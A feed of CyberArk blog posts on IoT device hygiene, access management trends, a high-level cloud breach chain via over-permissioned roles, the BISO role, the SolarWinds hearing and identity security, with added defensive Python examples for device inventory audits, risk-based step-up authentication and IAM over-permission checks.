  1. Catalog connected devices in your network. Identify every device on the network (including “BYO” devices) and understand what it does. This includes cameras, printers, doorbells, audio-visual equipment, HVAC systems, or anything else that connects to the internet and/or calls itself “smart.”
  2. Manage devices centrally. IoT devices are often manufactured with built-in or hardcoded passwords – making them easy targets. Replace these with strong, unique passwords, and automate credential storage, rotation, and management to minimize the risk of human error.
  3. Disable automatic root access. This is typically built into IoT devices such as security cameras. Yes, that level of access will be needed on occasion, but even trusted users should have to jump through a few hoops to validate their identity and access path to get it. Which brings us to number four…
  4. Implement the concept of “least privilege.” Limiting what people and devices have access to in a network is one of the best ways to reduce your attack surface and keep attackers from causing harm. Before granting access, always verify the identity, validate the device, then limit access to just what is needed – and remove it when it’s not.
  5. Secure remote access. To counteract the inherent weaknesses of IoT, limit remote access (for firmware updates, maintenance, and more) to verified parties, locations, and established ports.
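Steps 1 and 2 above are a procedure a team can automate. The following is an added example, not code from the original post or from Verkada: it reconciles the devices that actually hold DHCP leases against an asset inventory and flags devices that are unknown, or whose management credential has never been rotated (a strong hint the built-in default is still in use) or has not been rotated within the policy window. The lease lines, the inventory records and the 90-day rotation window are constructed for the example.

```python
"""Reconcile DHCP leases against an asset inventory and flag unmanaged
or default-credential IoT devices. Added example; sample data is constructed."""
from datetime import datetime, timedelta

# Constructed lease lines in dnsmasq format: expiry-epoch MAC IP hostname client-id.
# A hostname of "*" means the client did not announce one.
DHCP_LEASES = """\
1615900000 3c:ef:8c:aa:01:10 10.20.4.11 cam-icu-07 01:3c:ef:8c:aa:01:10
1615900300 3c:ef:8c:aa:01:22 10.20.4.12 cam-lobby-02 01:3c:ef:8c:aa:01:22
1615900600 b8:27:eb:55:10:9f 10.20.4.57 * 01:b8:27:eb:55:10:9f
1615900900 00:1a:2b:3c:4d:5e 10.20.4.80 hvac-roof-ctl 01:00:1a:2b:3c:4d:5e
"""

# Constructed inventory keyed by MAC. cred_last_rotated is the date the vault
# last rotated the device's management credential; None means never rotated.
INVENTORY = {
    "3c:ef:8c:aa:01:10": {"type": "camera", "owner": "facilities", "cred_last_rotated": "2021-02-20"},
    "3c:ef:8c:aa:01:22": {"type": "camera", "owner": "facilities", "cred_last_rotated": "2020-06-01"},
    "00:1a:2b:3c:4d:5e": {"type": "hvac", "owner": "facilities", "cred_last_rotated": None},
}


def parse_leases(text):
    """Turn dnsmasq lease lines into device records; skip malformed lines."""
    devices = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        expiry, mac, ip, hostname = parts[:4]
        devices.append({
            "mac": mac.lower(),
            "ip": ip,
            "hostname": None if hostname == "*" else hostname,
            "expires": int(expiry),
        })
    return devices


def audit(devices, inventory, today, max_age_days=90):
    """Return (mac, ip, reason) findings for devices that are not inventoried,
    have never had their credential rotated, or exceed the rotation window."""
    now = datetime.strptime(today, "%Y-%m-%d")
    findings = []
    for dev in devices:
        record = inventory.get(dev["mac"])
        if record is None:
            findings.append((dev["mac"], dev["ip"], "not in inventory"))
            continue
        rotated = record.get("cred_last_rotated")
        if rotated is None:
            findings.append((dev["mac"], dev["ip"],
                             f"{record['type']}: credential never rotated (default likely still set)"))
        elif now - datetime.strptime(rotated, "%Y-%m-%d") > timedelta(days=max_age_days):
            findings.append((dev["mac"], dev["ip"],
                             f"{record['type']}: credential older than {max_age_days} days"))
    return findings


if __name__ == "__main__":
    for finding in audit(parse_leases(DHCP_LEASES), INVENTORY, today="2021-03-16"):
        print(*finding, sep="  ")
```

Run against a real lease file (or an exported ARP/NAC table) the same way; the point is that the unknown device on 10.20.4.57 and the never-rotated HVAC controller surface automatically rather than during the post-incident review.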

Who Watches the Watchmen?

The Verkada breach showed us the dark and very dangerous side of the IoT. In its aftermath, new questions are swirling on how surveillance technology should (and should not) be used, how sensitive data should be stored and how access to this data should be managed. Beyond emphasizing current IoT risks, this attack has the potential for far-reaching privacy and regulatory implications, including HIPAA.

While connected cameras are making headlines today, the reality is that any device, endpoint, server, or system that connects to the internet, in any fashion, represents a potential vulnerability. In most enterprises today, more than 30% of all network-connected endpoints are IoT devices – and that’s not even counting mobile devices. Don’t wait for consensus on standards or push it down the priority list: the time to address IoT security in your organization is now.

]]>
Four Trends Shaping the Future of Access Management https://www.cyberark.com/blog/four-trends-shaping-the-future-of-access-management/ Tue, 16 Mar 2021 13:00:33 +0000 https://www.cyberark.com/?p=114320 Access Management Is Evolving

From a remote employee using a personal device for work, to a marketing consultant logging into a shared social media account, to a customer authenticating to use a SaaS app, someone is accessing your organization’s sensitive assets – without ever crossing the traditional network boundary – at any given moment.

That’s why Access Management tools that map access between individual identities and protected resources and provide real-time access control for those connections are critical to enforcing strong enterprise cybersecurity policies. However, as the scope of resources to which users need access is evolving and new drivers influence business strategies, Access Management solutions are growing in capability, increasingly overlapping and converging with adjacent security areas.

So, what matters most when evaluating an Access Management tool today? If you poll stakeholders across your organization you’ll probably get a variety of different answers, since most Access Management initiatives are championed by individual function owners with specific goals and tactical or short-term needs. However, despite differing opinions, most of the related investment drivers fall into four major categories:

  • Defending against attacks
  • Driving operational efficiencies
  • Enabling the digital business
  • Satisfying audit and compliance

Take the rapid shift to remote work, for example. IT security teams were pressured to enable secure remote access for employees to defend against rising cyber attacks tied to COVID-19. This requirement caused disproportionate investments in Access Management solutions that protected the remote workforce but likely limited the broader use of these solutions for other use cases. Most importantly, bolting on ad-hoc solutions reactively has resulted in a heap of disparate Access Management tools that only address specific needs and create potential security gaps across an organization’s digital identity landscape.

Four Trends Shaping the Access Management Space

1. The tactical expansion of Access Management tools has led to a serious security consistency challenge and a subsequent push toward unified access platforms that consolidate controls. Most of these tools already include multi-factor authentication (MFA), identity lifecycle management and basic access governance capabilities, such as access requests with approval workflows and directory synchronization. But the most effective platforms extend their reach with a privilege-centric approach to securing identities – embedding strong Privileged Access Management controls, such as verifying and authenticating users for privileged account access via single sign-on (SSO) and MFA from the Access Management tool, session isolation, and control of endpoint privileges. This convergence of Privileged Access Management and Access Management adds a multitude of risk mitigation benefits and creates new sources for contextual, adaptive access controls.

2. Which brings us to the second trend – AI-powered identity management and adaptive authentication. Enterprise access requirements have radically evolved. Meanwhile, authentication processes have not kept pace, as evidenced by pervasive password-based controls. More than 60% of businesses experience a security breach each year and roughly 40% of these occur due to a compromised user password.[1] Traditional, high-friction password processes are frequently ineffective because they rely on end-users remembering constantly changing, complex passwords. And when users are faced with strong authentication methods, they often skirt security processes to perform job tasks more expediently.

Adaptive Access Management, powered by AI, presents a compelling alternative. These solutions can operate without human intervention, gathering and analyzing intelligence on user behavior to visualize and contextualize risk, uncover threat patterns and dynamically adapt authentication processes and access controls. For example, organizations can create policies that prevent high-risk users from launching applications with customer data without validating their identity with high-assurance MFA factors such as physical tokens or fingerprint readers. Meanwhile, low-risk users accessing low-risk applications can skip secondary authentication and keep moving fast. This approach reduces the friction and complexity often associated with “always-on” MFA controls.
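The step-up logic described above can be made concrete as a small policy engine. The following is an added example and an illustrative model only, not CyberArk’s product logic: a baseline risk score from user behaviour analytics is combined with contextual signals, the application’s sensitivity class sets a minimum authenticator assurance level, rising risk raises that minimum, and the decision is “allow” if the factors the session has already completed meet it, a step-up to the needed level if not, or “deny” at extreme risk. The signal weights, factor strengths (ordered loosely in the spirit of NIST SP 800-63B assurance levels) and thresholds are assumed values a real deployment would tune.

```python
"""Risk-adaptive step-up authentication policy. Added illustrative example;
all weights, levels and thresholds are assumed values."""
from dataclasses import dataclass, field

# Assurance strength of authenticators the session has actually completed.
FACTOR_STRENGTH = {
    "password": 1, "sms_otp": 1,
    "totp": 2, "push": 2,
    "fido2_key": 3, "platform_biometric": 3,
}

# Minimum assurance each application class demands before any risk adjustment.
APP_BASELINE = {"low": 1, "customer_data": 2, "admin": 3}

# Contextual signals and the risk they add on top of the user's baseline score.
SIGNAL_WEIGHTS = {"new_device": 20, "impossible_travel": 40,
                  "anonymizing_proxy": 30, "off_hours": 10}


@dataclass
class AccessRequest:
    user_risk: int                      # 0-100 baseline from behaviour analytics (assumed upstream input)
    app_class: str                      # key of APP_BASELINE
    signals: dict = field(default_factory=dict)
    factors_completed: tuple = ("password",)


def risk_score(req):
    """Baseline plus weights of every signal that fired, capped at 100."""
    extra = sum(w for name, w in SIGNAL_WEIGHTS.items() if req.signals.get(name))
    return min(100, req.user_risk + extra)


def required_assurance(req):
    """The app's baseline, raised as session risk climbs."""
    need = APP_BASELINE[req.app_class]
    score = risk_score(req)
    if score >= 40:
        need = max(need, 2)          # moderate risk: at least a second factor
    if score >= 70:
        need = 3                     # high risk: phishing-resistant factor only
    return need


def decide(req):
    """Return 'allow', 'step_up:<level>' or 'deny'."""
    if risk_score(req) >= 90:
        return "deny"                # too risky to authenticate at all
    have = max(FACTOR_STRENGTH.get(f, 0) for f in req.factors_completed)
    need = required_assurance(req)
    return "allow" if have >= need else f"step_up:{need}"


if __name__ == "__main__":
    # Low-risk user, low-risk app: password alone keeps them moving.
    print(decide(AccessRequest(10, "low")))
    # Same user opening an app holding customer data: one more factor.
    print(decide(AccessRequest(10, "customer_data")))
    # Risky session on a new device with only TOTP: hardware key or biometric required.
    print(decide(AccessRequest(55, "customer_data", {"new_device": True}, ("password", "totp"))))
```

The design point is that the friction lands where the risk is: the same user is never asked for a hardware key on a known device opening a low-risk app, while a session that trips the impossible-travel signal cannot reach customer data with a password and a one-time code.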

3. Expectations for great digital experiences are at an all-time high. Advancements in Customer Identity and Access Management (CIAM) are helping organizations meet these demands by delivering easier, more secure customer access to their websites and apps.

Traditionally, customer authentication has been a point-in-time decision based on the initial credentials the user presented. This could potentially lead to unauthorized access if the customer’s device or credentials were compromised. Modern CIAM solutions leverage user behavior analytics (similar to those described above), such as measuring navigational activity against an established baseline, to authenticate customer identities accurately. And advanced CIAM features such as profile management, customer consent management, and master data management enable support across the entire digital customer journey.

4. The race to the cloud is driving demand for scalable “as-a-service” security solutions – and Access Management is no exception. Organizations are embracing SaaS-delivered Access Management to ease deployment and use, provide more robust, end-to-end security, and realize a host of operational benefits. Even organizations with extensive hybrid environments and many legacy or non-standards-based applications are making the shift thanks to services like app gateways that secure remote access to on-premises apps and give users one-click SSO access to all the apps they need.

As IT environments evolve, cyber criminals increasingly target identities and more organizations adopt a Zero Trust mindset, security, risk, and identity leaders must consider these four trends in totality as they evaluate new Access Management tools and approaches. Watch our on-demand webinar to explore them in-depth.

[1]  Contextual Awareness: Advancing Identity and Access Management to the Next Level of Security Effectiveness, March 2020.

]]>
Attacker Productivity: Exploit Misconfigured Identities in the Cloud https://www.cyberark.com/blog/attacker-productivity-exploit-misconfigured-identities-in-the-cloud/ Fri, 12 Mar 2021 13:30:00 +0000 https://www.cyberark.com/?p=114173 Misconfigured Cloud Identities

“My goal is no longer to get more done, but rather to have less to do,” writes author Francine Jay. It’s a sentiment that resonates with many of us juggling work, life, and everything in between. There’s no shortage of self-help books and time management tools out there promising to help you master the art of productivity. Unfortunately, attackers have also embraced this notion and their search for ways to work smarter, not harder, has led them straight to the cloud because:

  • (Nearly) everyone is there. A vast majority of enterprises are currently engaged with one or more cloud service providers, and many are running mission-critical applications or storing sensitive data there.
  • There are so many ways to access valuable data. Cloud computing requires the creation and use of numerous Identity and Access Management (IAM) permissions and entitlements to access cloud infrastructure and services. Each of these identities can become privileged under certain conditions, opening a path to an organization’s most valuable data and assets.
  • There are fewer steps to take. Attacks against on-premises infrastructure and applications typically take multiple steps: compromise an initial system, escalate privileges and move laterally to compromise another, then another, then another, until the attacker “owns” a domain. But in the cloud, attackers can fast-track their efforts. By compromising one user’s privileged credentials or API keys, they’re well on their way to achieving their goal in fewer steps, taking less time and with significantly less effort.
  • There’s a gap between cloud adoption and security. IT security teams have been forced to learn and protect brand-new environments quickly and in parallel. Their familiar ways of working and traditional network perimeter security approaches simply don’t work in modern cloud environments. Lacking technical cloud security knowledge and cloud-centric tools – while often being tasked with securing multiple cloud environments at once – they’re struggling to defend their organizations. And attackers know they have an advantage.

This is the first in a three-part series on real-world cloud attacks, illustrating how cyber criminals and malicious insiders are scaling their efforts and getting more done by exploiting vulnerabilities in the cloud. Use these deconstructions to start thinking like an attacker and mapping out your own proactive security strategies.

Are You a Cloud Misconfiguration Away from a Data Breach?

The dynamic nature of the cloud often leads to the misconfiguration of permissions and entitlements associated with identities or users. In fact, the Ponemon Institute 2020 Cost of a Data Breach Report identifies cloud identity misconfigurations as “attackers’ entry point of choice.” Combined with stolen or compromised credentials, cloud identity misconfigurations represent nearly 40% of malicious incidents today.

When you consider that each of the major cloud platforms has more than 5,000 possible permissions and actions that can be assigned, it’s easy to see how misconfigurations happen – and add up fast. Given the scale of deployments, speed of change, and limited visibility from cloud-native tools, a common challenge is the accumulation of unnecessary or unused permissions, which is often not visible to overburdened security teams.

Here is a brief deconstruction of a real-world cloud attack chain that utilized misconfigured cloud identities to fast-track attacker efforts and breach a victim organization’s environment:

Misconfigured Cloud Identities in a Cloud Chain Attack

Step 1. Establish an initial foothold: A misconfigured firewall provides the attacker entry into the company’s cloud provider network and allows privileged access to a virtual server. The attacker exploits a common cloud vulnerability in the webserver that runs on the virtual server and compromises access keys.

Step 2. Escalate privileges: The attacker assumes an over-permissioned role and obtains temporary security credentials to the company’s cloud provider storage bucket.

Step 3. Gain access: The attacker accesses sensitive customer information, including individuals’ social security numbers and personal data, in the storage bucket.

The Result: The attacker exfiltrates millions of individuals’ personal data and can now sell it for profit in underground markets. As a result of the breach, the victim organization is forced to pay millions of dollars in regulatory fines. What’s more, the attacker also used the company’s cloud processing power to mine cryptocurrency (cryptojacking).
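Step 2 of the chain only works because the role the attacker assumes is over-permissioned. The following is an added example, not code from the original post or from any cloud provider: a simplified IAM-style policy evaluator (implicit deny, explicit Deny overrides Allow, `*` and `?` wildcards, case-insensitive action names) alongside a check that flags the two grants behind the attack, a whole-service action such as `s3:*` and a `Resource` of `*`. Conditions, `NotAction` and resource-based policies are deliberately left out. The two policy documents are constructed: the first resembles the over-permissioned role in the chain, the second is the least-privilege version that would have kept the customer bucket out of reach.

```python
"""Simplified IAM policy evaluation and over-permission check.
Added example; the policy documents below are constructed."""
import fnmatch

# Constructed: the kind of role that turns a compromised web server into a data breach.
OVER_PERMISSIONED = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["ec2:Describe*"], "Resource": "*"},
    ],
}

# Constructed: the same workload scoped to the one bucket prefix it actually serves,
# with an explicit Deny on the customer-records bucket as a second line of defense.
LEAST_PRIVILEGE = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::app-static-assets/*"},
        {"Effect": "Deny", "Action": "s3:*",
         "Resource": "arn:aws:s3:::customer-records*"},
    ],
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _match(pattern, value, case_sensitive):
    # IAM wildcards: '*' matches any run of characters, '?' exactly one.
    # Action names are case-insensitive; resource ARNs are matched as written.
    if not case_sensitive:
        pattern, value = pattern.lower(), value.lower()
    return fnmatch.fnmatchcase(value, pattern)


def is_allowed(policy, action, resource):
    """Implicit deny; any matching explicit Deny wins over every Allow."""
    allowed = False
    for stmt in policy["Statement"]:
        if not any(_match(p, action, False) for p in _as_list(stmt.get("Action", []))):
            continue
        if not any(_match(p, resource, True) for p in _as_list(stmt.get("Resource", []))):
            continue
        if stmt["Effect"] == "Deny":
            return False
        allowed = True
    return allowed


def find_over_permissions(policy):
    """Flag Allow statements that grant a whole service or every resource."""
    findings = []
    for idx, stmt in enumerate(policy["Statement"]):
        if stmt.get("Effect") != "Allow":
            continue
        for action in _as_list(stmt.get("Action", [])):
            if action == "*" or action.endswith(":*"):
                findings.append((idx, "service-wide action", action))
        for res in _as_list(stmt.get("Resource", [])):
            if res == "*":
                findings.append((idx, "all resources", res))
    return findings


if __name__ == "__main__":
    pii = "arn:aws:s3:::customer-records/ssn-export.csv"
    print("over-permissioned role can read PII:", is_allowed(OVER_PERMISSIONED, "s3:GetObject", pii))
    print("least-privilege role can read PII:  ", is_allowed(LEAST_PRIVILEGE, "s3:GetObject", pii))
    for finding in find_over_permissions(OVER_PERMISSIONED):
        print("finding:", finding)
```

Run the check across every role that can be assumed by a compute identity (instance profiles, task roles, service accounts); a server-side bug that leaks temporary credentials is only as damaging as the policy attached to the role that issued them.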

Explore 11 Ways to Reverse the Attacker’s Cloud Advantage

Reversing the attacker advantage and protecting against cloud attacks on identity requires a proactive, identity-centric approach to security. Here are 11 foundational safeguards you can take now to get started. And if you’re looking for help along the way, The CyberArk Blueprint for Identity Security Success (or CyberArk Blueprint for short) is a vendor-agnostic framework for assessing your current strategy and strengthening security across your people, processes, and technology to drive resiliency in the cloud-first world.

Next up, we’ll explore how attackers hijack cloud credentials embedded in code.

]]>
Why the BISO May Be the Utility Player Your Org Needs Now https://www.cyberark.com/blog/why-the-biso-may-be-the-utility-player-your-org-needs-now/ Wed, 10 Mar 2021 15:20:07 +0000 https://www.cyberark.com/?p=113937 The Rise of the BISO

Back in 2012, Security Innovation wrote about what – at the time – was a relatively new C-Level role dubbed Chief Information Security Officer. In the introductory blog post, the author attempted to explain this multifaceted role by suggesting that someone in that position could approach their work in one of several ways: most tended to fall in the categories of technical-focused CISO or a policy-focused CISO.

These approaches, referred to as TISO (“Technical Information Security Officer”) and BISO (“Business Information Security Officer”) respectively in the piece, were presented less as disciplines in their own right and more just ways to define approaches to the CISO role. It was as though how one approached the job was kind of up to the individual, but at the end of the day, they had to bear the responsibility of all technical security concerns, from anticipating problems to implementing solutions to educating and aligning internal teams.

For anyone who came of age professionally in the late ‘90s and through the 2000s, what happened in the ensuing years after Security Innovation’s post should come as no surprise. Technological advancements would often start out clearly siloed and distinct before becoming gradually ingrained into every level of an organization’s business – in fact, becoming key to the company’s overall business growth.

So, the suggestion that a CISO could be a TISO or a BISO has now become: Is it time for a dedicated BISO?

Evolving to the BISO

To clearly define the BISO’s role, it’s important to know how it evolved. Going back 20 or 30 years, the first real C-Level title to grow out of the IT space was the CIO. This was an executive who had to balance technical expertise with the ability to elevate and communicate the organization’s tech needs to the CFO. Out of that role emerged the CISO, which focused on technological innovation and communication in terms of security – but usually with a similar task of convincing top-level stakeholders that investment in security was necessary to the health of their business.

A 2021 study conducted by PwC found that 50% of CISOs surveyed said they are now more likely to consider cybersecurity in every business decision, up from 25% the year before. On top of that, an overwhelming 96% said they will adjust their cybersecurity strategy due to COVID-19. It doesn’t require a leap to connect these stats with the rise and growing visibility of the BISO.

“The role was born out of necessity,” says CyberArk Strategy and Corporate Development Associate Lex Register. “It’s probably impossible for a leader in IT security to just bolt on business skills. A lot of organizations are seeing that you need a bridge – you need someone who can talk to both sides.”

If more CISOs were seeing the importance of making cybersecurity a part of every business decision, the security concerns raised by the increase in remote work and at-home “device hopping” due to the pandemic has only further crystallized the idea that this “bridge” role was a necessary evolution and a discipline in its own right.

“They can’t just talk tech anymore,” says Register. “They have to put into business terms why the investments they’re making on the security side are needed.”

As writer and security advocate Alyssa Miller writes, “BISOs work closely with the CISO and business leaders to make sure that corporate security objectives are treated as business requirements.” To put it another way, rather than expecting a CISO to suddenly adopt business jargon, the BISO would – ideally – have experience on both sides to be able to smoothly translate concerns, solutions, and responses in a language that speaks to both groups.

A New Multitool Player Mashup

The SolarWinds attack at the end of 2020 was seen by many in cybersecurity as a wake-up call. It’s the type of event that sends ripple effects through nearly every industry, causing a widespread reevaluation of what organizations are doing to increase security, which partners they’ll do business with, and what kind of people they need in place internally to help defend against attacks. It has also, in turn, paved the way (albeit with some fairly treacherous asphalt) for more BISOs.

A search of BISO job listings these days brings up terms not often associated with any technical position, much less upper-level technical positions – things like “creative problem solving” and “influencing company culture.” This is because BISOs do more than just address security issues, they must be the tip of the spear when it comes to cultivating a security-aware culture. It’s almost equal parts tech, business, and public relations. Yes, PR – it seems the BISO could be considered a Swiss Army knife role.

As so many incidents like the SolarWinds breach have shown, cybersecurity threats still thrive most effectively on human error. A BISO has to be creative and almost think like a PR strategist (or even an HR rep) – finding engaging ways to influence leadership and build awareness that security is just as much the employees’ job as it is that of the IT department. Register describes BISOs sending out fake company-wide emails with phony phishing links in them to reinforce employee awareness – and whoever takes the bait and clicks receives a reminder to be more careful or follow-up cybersecurity training.

A BISO may also be called upon to interact with marketing and corporate communications, bringing their research into potential attack vectors, typical points of vulnerability, and unique understanding of the “attacker mindset” to the fore to guide organizations that are increasingly touting cybersecurity as a competitive advantage in the marketplace. The BISO can help shape the conversation not only to strengthen the infrastructure behind the claim internally but to ensure clear and effective information about a company’s cybersecurity efforts is also conveyed to the customer.

While the CISO is focused on getting executive support for critical security initiatives, the BISO is working in tandem to creatively educate leadership and non-technical employees about the importance of these initiatives.

Infusing Creativity into Cybersecurity Roles

Perhaps the biggest and arguably most impactful change to come out of the increased visibility of the BISO role is a rethinking of cybersecurity roles through the prism of creativity. People in IT roles are rarely afforded the time to think creatively. Allowing a BISO the time to research, network and experiment – even if the end result isn’t highly visible across an organization – will ultimately have a much more positive impact on your organization’s overall security. That’s because a BISO must anticipate new security threats. They know how attackers think, so they need to stay a few steps ahead, and this is only possible if they’re allowed that space.

“A lot of the job is managing internal and external relationships, talking with vendors, and finding out what’s the newest, greatest stuff out there,” says Register. “It’s part internal execution and part pure exploration.”

To use the insurance analogy, cybersecurity is doing its job when you don’t know it’s there. And when BISOs are doing their jobs, you don’t see them as singularly focused – they are strategic resources who can appreciate the speed it takes to innovate, without sacrificing security and raising overall organizational risk. They are in every room, in every conversation, helping every stakeholder understand that security is a top-down responsibility. The evolution has been relatively slow when you consider the speed at which other aspects of technology have grown, but it has been steady. Recent events have pushed these ideas to the forefront, and as perceptions change, roles are more clearly defined and more creativity enters the mix – the result is stronger, more agile cybersecurity.

So, yes – now is the time for a dedicated BISO.

 

 

 

 

]]>
SolarWinds Senate Hearing: Moving Forward It’s All About Zero Trust https://www.cyberark.com/blog/solarwinds-senate-hearing-moving-forward-its-all-about-zero-trust/ Wed, 03 Mar 2021 16:59:04 +0000 https://www.cyberark.com/?p=113311 SolarWinds Senate Hearing Zero Trust

We still don’t have a complete picture of what exactly happened during the SolarWinds attack in 2020, nor do we know the full extent yet of the damage or what the long-term impact may be. However, imagine how much less we would know – and how much more vulnerable the world would be – if private security firm FireEye had not come forward to report the attack after discovering its own systems had been infected.

That question was at the heart of the U.S. Senate Select Committee on Intelligence hearing held on Feb. 23. SolarWinds CEO Sudhakar Ramakrishna, FireEye CEO Kevin Mandia, Microsoft president Brad Smith, and CrowdStrike CEO and President George Kurtz were all in attendance as witnesses to discuss the novel March 2020 attack – believed by many to be the work of nation-state attackers who successfully compromised identities and manipulated privileged access to pull off a massive, targeted digital supply chain attack that potentially compromised thousands of government and private sector entities.

Through hours of testimony and questioning, two things came to the fore:

1. Today, private organizations have no legal obligation to report breaches to government agencies of any kind. Even when an unauthorized entity gains access to an organization’s most sensitive data and assets, nothing actually requires the organization to notify the government. Mandatory participation is needed, and communication between government agencies needs to be streamlined.

2. Federal government agencies and departments are frequent targets for nation-state attackers. Whether the goal is to compromise sensitive government data, steal personally identifiable information (PII), or disrupt operations, the sophistication of such attacks makes it increasingly difficult to safeguard critical cyber infrastructure. These challenges are made even more difficult by the government’s lack of resources, overall visibility into threats, and standardized security processes. There’s broad consensus that a new approach to cybersecurity is needed – one grounded in Zero Trust.

Transparency is the Way Forward

Nation-state attackers are well-funded, highly organized, incredibly sophisticated, and extremely patient – and in most cases, they will find a way inside no matter how strong an organization’s defenses. During the hearing, Ramakrishna made vehemently clear during his first public acknowledgment of the incident that the principle of least privilege had been overlooked by SolarWinds, putting the crosshairs directly on their backs. Explaining why SolarWinds’ Orion platform was targeted, he said, “When you gain access to the Orion platform you gain administrative privileges to the Windows servers that the Orion platform is running on – and so if you were to run that with lower privileges, even if an attacker were to gain control, they won’t be able to do as much damage because you’re a regular user and not an administrator of that network.”

Generally speaking, implementing preventative controls that consistently enforce least privilege helps buy an organization invaluable time, frustrating attackers to the point of forcing their hand to use methods and techniques that expose their presence.

The sophistication of this attack was referenced a number of times. The SolarWinds attackers were extremely careful not to raise traditional red flags, which made the attack (and its reach) harder to detect and determine. They leveraged U.S.-based infrastructure, which allowed them to avoid immediate detection. Additionally, they impersonated users with specific access and avoided the use of domain admin access to further decrease the chance for detection.

The hearing brought to the surface the need for higher levels of security and cooperation across the public and private sectors and a call for encouraging greater transparency regarding cyber attack reporting. The hearing made it clear a confidential disclosure program would both protect a company’s reputation and improve cybersecurity at the federal and private levels.

In a step in the right direction, just a few days before the hearing the government announced sweeping executive action. Anne Neuberger, deputy national security advisor for cyber and emerging technology, said in a White House press briefing that the government is “working on close to about a dozen things. Likely, eight will pass to be part of an upcoming executive action to address the gaps we have identified in our review of this incident.”

Cyber Hygiene for All

SolarWinds shed light on the far-reaching impacts of supply chain attacks and the need for a proactive approach to security. By adopting an “assume breach” mindset, government agencies and private organizations can enforce multiple layers of security to reduce the greatest amount of risk. This approach, referred to as “defense in depth,” is based on Zero Trust principles. And it comes down to three things:

1. Working to make sure your organization’s own internal infrastructure is secured, and that attention is focused on preventing attackers from reaching their end goals. This includes securing access to Tier0 systems.

2. Protecting development environments – including the CI/CD pipeline, which was the critical first phase of the SolarWinds attack. Some important proactive steps include validating the integrity of all code and builds, securing access to highly privileged pipeline orchestrators and infrastructure managers – and enforcing just-in-time access policies in these highly automated environments.

3. Focusing on bolstering the security of customer-facing products and services, with a critical eye on the security practices and stability of digital supply chain partners.

The testimony that came out of the hearing made clear that it’s hard to fully stop an attack of this precision and scale – but an “assume breach” mindset will enable organizations to become vigilant and hyper-focused on addressing weaknesses and vulnerabilities that exist within their IT environment, especially the areas that provide access to critical systems and infrastructure (i.e. privileged access).

“Zero Trust” and “least privilege” may still seem like buzzwords to some, but in the wake of this hearing they will continue to be the impetus behind a push for stronger security protocols, more transparent communication between private organizations and the federal government – and, ideally, more effective ways to mitigate the risks of large-scale attacks.
Why You Need Identity Security https://www.cyberark.com/blog/what-is-identity-security/ Mon, 01 Mar 2021 22:46:01 +0000 https://www.cyberark.com/?p=113215 What is Identity Security

As consumers, we’ve come to expect our digital experiences to be easy, fast, intuitive and highly personalized. To meet these increasing demands and gain competitive advantage, companies have doubled down on cloud-based technologies and services in recent years. This unstoppable momentum accelerated tenfold in 2020, when virtually every aspect of our lives changed, from the ways we work and learn, to the ways we buy products and services, to the way we interact with one another.

Now, to quote a recent Accenture report, “an experience renaissance is afoot,” and as organizations focus more than ever on delivering exceptional end-user experiences, digital transformation has taken hold. This rapid innovation – coupled with the technical intricacies of supporting distributed workforces – has caused the number, types and interconnectedness of identities to multiply across business applications and cloud workloads, dissolving physical and network security barriers that once clearly delineated the “good guys” from the bad ones.

All Roads Lead to Identity

While several years ago only small groups of users (mostly IT admins) were considered privileged, in today’s environment, any identity – whether customer, remote worker, third-party vendor, device or application – can become privileged under certain conditions, creating an attack path to an organization’s most valuable assets.

Just a few examples of these new dimensions to the threat landscape include the extreme danger posed by cloud console access, excessive cloud entitlements and embedded DevOps and application secrets. Attackers fully recognize the opportunity: an IDSA study found 79% of enterprises have experienced an identity-related breach within the last two years. And like so many others, the recent SolarWinds digital supply chain attack involved the compromise of identity and manipulation of privileged access.

In the face of these modern threats, it’s clear that identity has become the new security battleground and that an “assume breach” mentality, based on the principles of Zero Trust, is absolutely critical. But while cyber attacks are inevitable, negative business impact is not.

Identity Security to Move Fearlessly Forward

Today, we introduced new Identity Security offerings that complement the CyberArk Identity Security portfolio and demonstrate continued innovations that deliver on our vision.

While we’re excited about this powerful new suite of subscriptions, programs and tools, we thought it’d be helpful to take a step back and explain exactly what we mean by “Identity Security.”

The CyberArk Identity Security approach is centered on privileged access management and focuses on securing individual identities – human or machine – throughout the cycle of accessing critical assets.

This means authenticating that identity accurately, authorizing that identity with the proper permissions and providing access for that identity to privileged assets in a structured manner – all in a way that can be audited (or accounted for) to ensure the entire process is sound. With CyberArk Identity Security, organizations can secure access across any device, anywhere, at just the right time – so they don’t have to choose between security and productivity.

Now, you might be asking, “How is that different than Zero Trust?”

Zero Trust is not a solution or technology but rather an approach to security based on the principle of “never trust, always verify.” This approach ensures every user’s identity is verified, their devices are validated, and their access is intelligently limited to just what they need – and taken away when they don’t. As the embodiment of this model, Identity Security offers a set of technologies that are foundational to achieving Zero Trust.

The Most Complete and Flexible Set of Identity Security Capabilities

At CyberArk, security is in our DNA, and as the pioneer and leader of the Privileged Access Management market, we are uniquely positioned to address the fast-changing nature of privilege and help organizations embrace a risk-based strategy for defending against identity-based attacks.

Our AI-powered approach eliminates friction and risky habits that stem from repetitively requesting re-authentication every time a user attempts to access a system – balancing the requirements of strong security with the desire to provide an excellent end user experience. We do this by using real-time intelligence and analytics to separate the good from the bad and grant only what’s needed, just in time. Potential threats are contained, neutralized and remediated before they do harm.

Beyond strong identity assurance, we infuse organizations with the confidence and agility they need to accelerate transformation initiatives, so they can deliver exceptional experiences that drive customer loyalty and measurable business impact.

A Roadmap for Identity Security Success

Identity Security offers organizations the peace of mind that their most critical assets are protected. But getting started can be half the battle.

Founded on best practices gained through years of hands-on customer engagements and cutting-edge research from the CyberArk Labs team, the CyberArk Blueprint is a best practice framework for Identity Security success. Whether you’re focused on securing access to on-premises infrastructure, agile software development methods or new digital transformation projects right now, tap into the Blueprint as you chart your course.
Pandemic Cyber Crime, By the Numbers https://www.cyberark.com/blog/pandemic-cyber-crime-by-the-numbers/ Fri, 26 Feb 2021 13:30:13 +0000 https://www.cyberark.com/?p=113076 Cybersecurity Stats

